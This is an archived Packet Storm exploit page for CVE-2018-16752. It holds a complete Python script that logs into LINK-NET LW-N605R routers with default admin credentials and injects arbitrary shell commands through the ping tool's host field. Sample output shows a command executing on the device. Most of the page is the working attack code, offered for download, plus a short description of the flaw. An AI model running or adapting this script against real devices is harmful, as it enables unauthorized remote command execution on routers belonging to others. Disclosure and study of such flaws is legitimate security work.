Twenty Year Anniversary

LW-N605R Remote Code Execution

LW-N605R Remote Code Execution
Posted Sep 10, 2018
Authored by Nassim Asrir

LW-N605R devices allow remote code execution via shell metacharacters in the HOST field of the ping feature at adm/systools.asp. Authentication is needed but the default password of admin for the admin account may be used in some cases.

tags | exploit, remote, shell, code execution, asp
advisories | CVE-2018-16752
MD5 | 381dfb828206901640b7a36fed462414

LW-N605R Remote Code Execution

Change Mirror Download
''' 
# Title: LW-N605R - Remote Code Execution

# Author: Nassim Asrir

# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/

# Vendor: LINK-NET

# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the HOST field of the ping feature at adm/systools.asp.
Authentication is needed but the default password of admin for the admin account may be used in some cases.

# CVE: CVE-2018-16752

# Example:

aa[root@parrot]a[/home/sniperpex/Desktop]
aaaa1/4 #python ./blue.py -t http://host/ -c ls -u admin -p admin


_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim



[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!

var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''
import urllib2

import base64

import optparse

import sys

import bs4

banner = """

_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim


"""

# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')

sys.exit(1)
else:
return url+"/goform/sysTools"

def connectionScan(url,user,pwd,cmd):
print '[+] Connection in progress...'
try:
response = urllib2.Request(url)
content = urllib2.urlopen(response)
print '[X] LW-N605R Authentication not found'
except urllib2.HTTPError, e:
if e.code == 404:
print '[X] Page not found'
elif e.code == 401:
try:
print '[+] Authentication in progress...'
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
response.add_header("Authorization", "Basic %s" % base64string)
content = urllib2.urlopen(response).read()
if "putmsg(mPingCount);" in content:
print '[+] Username & Password: OK'
print '[+] Checking for vulnerability...'
if 'e' in content:
print '[!] Command "'+cmd+'": was executed!'
else:
print '[X] Not Vulnerable :('
else:
print '[X] No LW-N605R page found'
soup = bs4.BeautifulSoup(content, 'html.parser')

for textarea in soup.find_all('textarea'):
print textarea.get_text()
except urllib2.HTTPError, e:
if e.code == 401:
print '[X] Wrong username or password'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)

print(banner)

url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd

connectionScan(url,user,pwd,cmd)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    5 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close